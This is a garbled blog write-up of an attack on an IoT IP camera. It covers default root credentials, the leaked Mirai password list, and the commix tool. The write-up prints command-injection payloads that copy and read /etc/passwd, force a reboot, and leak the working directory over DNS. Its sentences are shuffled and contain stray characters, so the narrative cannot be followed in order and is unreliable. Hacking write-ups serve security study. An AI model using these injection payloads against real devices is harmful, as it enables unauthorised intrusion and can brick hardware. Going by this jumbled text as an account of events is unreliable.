![]() I still can request some of the cgi scripts like get_status and get_params.cgi: Look like the updated some firmwares and the root / 123456 isn't working anymore. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs. Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. But this double-blind hack was a bit too much for this automated tool, unfortunately. Think commix like sqlmap, but for command injection. I also tried commix, as it looked promising on Youtube. There is no head, tr, less, more or cut on this device. $(cat/tmp/c) filter out unwanted charactersĪfter I finally hacked the camera, I saw the problem. $(cat /tmp/a|head -1>/tmp/b) filter for the first row $(cp /etc/passwd /tmp/a) copy /etc/passwd to a file which has a shorter name And this is the time to thank EQ for his help during the hacking session night, and for his great ideas. The following are some examples of my desperate trying to get shell access. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. ![]() I was able to leak some information via DNS, like with the following commands I was able to see the current directory: $(ping%20-c%202%20%60pwd%60)īut whenever I tried to leak information from /etc/passwd, I failed. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |